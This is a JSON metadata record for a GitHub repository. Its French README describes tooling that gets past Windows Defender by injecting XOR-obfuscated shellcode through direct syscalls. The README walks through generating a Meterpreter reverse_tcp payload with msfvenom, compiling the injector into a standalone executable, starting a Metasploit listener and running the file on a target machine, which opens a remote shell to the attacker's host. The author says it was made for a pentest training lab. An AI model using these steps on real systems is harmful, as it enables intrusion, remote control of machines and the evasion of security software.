{"id":22647400,"url":"https://github.com/processust/bypass-av-directsyscalls","last_synced_at":"2025-10-28T14:06:29.879Z","repository":{"id":82910792,"uuid":"529286730","full_name":"ProcessusT/Bypass-AV-DirectSyscalls","owner":"ProcessusT","description":"Scripts permettant de contourner la protection antivirale de Windows Defender via la technique de Direct Syscalls avec une injection de shellcode préalablement obfusqué avec un fonction XOR.","archived":false,"fork":false,"pushed_at":"2022-10-14T08:38:24.000Z","size":62,"stargazers_count":27,"open_issues_count":0,"forks_count":10,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-12T02:12:30.036Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ProcessusT.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-08-26T14:19:34.000Z","updated_at":"2025-03-09T12:39:01.000Z","dependencies_parsed_at":null,"dependency_job_id":"465705f1-938b-423d-9094-b709c8fcef57","html_url":"https://github.com/ProcessusT/Bypass-AV-DirectSyscalls","commit_stats":null,"previous_names":["processust/bypass-av-directsyscalls"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FBypass-AV-DirectSyscalls","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FBypass-AV-DirectSyscalls/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FBypass-AV-DirectSyscalls/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FBypass-AV-DirectSyscalls/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ProcessusT","download_url":"https://codeload.github.com/ProcessusT/Bypass-AV-DirectSyscalls/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248505926,"owners_count":21115354,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-09T07:33:29.973Z","updated_at":"2025-10-28T14:06:29.802Z","avatar_url":"https://github.com/ProcessusT.png","language":"C#","readme":"Scripts permettant de contourner la protection antivirale de Windows Defender via la technique de Direct Syscalls avec une injection de shellcode préalablement obfusqué avec un fonction XOR.\n\n\n\nCes derniers ont été utilisés dans un lab d'entrainement au pentest et ne sont pas prévus pour être utilisés en dehors de ce cadre.\n\n\u003cbr /\u003e\u003cbr /\u003e\n-----------------------------------------------------\n\u003cbr /\u003e\n\n\u003cp align=\"center\"\u003e\n    Ma vidéo sur le sujet : \u003ca href=\"#\"\u003e\u003cstrong\u003eBientôt disponible\u003c/strong\u003e\u003c/a\u003e\n  \u003c/p\u003e\n\n\u003cbr /\u003e\u003cbr /\u003e\n-----------------------------------------------------\n\u003cbr /\u003e\n\n\n\n\u003ch2 align=\"center\"\u003eBypass-AV-DirectSyscalls\u003c/h2\u003e\n\n  \u003cp align=\"center\"\u003e\n    Ce projet est basé sur le dépôt Github de chvancooten :\n    \u003cbr /\u003e\n    \u003ca href=\"https://github.com/chvancooten/OSEP-Code-Snippets\"\u003e\u003cstrong\u003ehttps://github.com/chvancooten/OSEP-Code-Snippets\u003c/strong\u003e\u003c/a\u003e\n  \u003c/p\u003e\n\u003c/div\u003e\n\n\u003cbr /\u003e\u003cbr /\u003e\n\n\n\n\n\n### Utilisation\n\n1. Générer un meterpreter Metasploit sous la forme d'un shellcode avec msfvenom :\n```\nmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=\u003cSERVER\u003e LPORT=\u003cPORT\u003e -f csharp\n```\n2. Créer un nouveau projet DotNet dans Visual Studio Code :\n```  \ndotnet new console\n```\n3. Remplacer le contenu de Program.cs par le contenu du fichier XorCipher.cs et remplacer le shellcode par celui généré avec msfvenom\n4. Générer la solution sous la forme d'un fichier PE avec ses librairies embarquée :\n```\ndotnet publish -p:PublishSingleFile=true -r win-x64 -c Release --self-contained true -p:PublishTrimmed=true\n```\n5. Exécuter le fichier compilé dans une invite de commande :\n```\n.\\XorCipher.exe\n```\n6. Créer un second projet DotNet dans une autre instance de Visual Studio Code :\n```\ndotnet new console\n```\n7. Remplacer le contenu de Program.cs par le contenu du fichier DirectSyscalls.cs et remplacer le shellcode par celui généré avec XorCipher.exe\n8. Générer la solution sous la forme d'un fichier PE avec ses librairies embarquée :\n```\ndotnet publish -p:PublishSingleFile=true -r win-x64 -c Release --self-contained true -p:PublishTrimmed=true\n```\n9. Lancer un listener dans la console metasploit :\n```\nmsfconsole\nuse multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost \u003cSERVER\u003e\nset lport \u003cPORT\u003e\nexploit\n```\n10. Exécuter le fichier DirectSyscalls.exe sur le poste cible puis savourer un délicieux cookie aux pépites de chocolat :)\n\n\n\n\n-----------------------------------------------------------------------------------\n\n\n\n\n\u003cp align=\"center\"\u003e\n    Le lien de mon blog : \u003ca href=\"https://lestutosdeprocessus.fr\"\u003e\u003cstrong\u003ehttps://lestutosdeprocessus.fr\u003c/strong\u003e\u003c/a\u003e\n    \u003cbr /\u003e\n    \u003cbr /\u003e\n    Le lien pour rejoindre le serveur Discord : \u003ca href=\"https://discord.gg/JJNxV2h\"\u003e\u003cstrong\u003ehttps://discord.gg/JJNxV2h\u003c/strong\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n\n\n \n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprocessust%2Fbypass-av-directsyscalls","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprocessust%2Fbypass-av-directsyscalls","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprocessust%2Fbypass-av-directsyscalls/lists"}